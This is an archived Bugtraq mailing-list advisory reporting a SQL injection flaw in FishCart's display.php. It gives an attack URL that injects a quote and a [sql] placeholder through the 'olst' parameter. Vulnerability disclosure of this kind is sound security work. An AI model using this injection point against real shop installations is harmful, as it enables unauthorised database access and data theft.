[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FishCart [injection sql]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FishCart [injection sql]
From: saps.audit@xxxxxxxxx
Date: 21 Jan 2007 19:45:59 -0000

vendor site: http://fishcart.org/
product :fish cart
bug:injection sql
risk : medium

injection sql :
/display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql]

( change the cartid value with yours )

laurent gaffie
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx

Follow-Ups:
- Re: FishCart [injection sql]
  - From: Michael Brennen

Prev by Date: Re: SMF "index.php?action=pm" Cross Site-Scripting
Next by Date: Re: Multiple OS kernel insecure handling of stdio file descriptor
Previous by thread: Wiki-how path disclosure
Next by thread: Re: FishCart [injection sql]
Index(es):
- Date
- Thread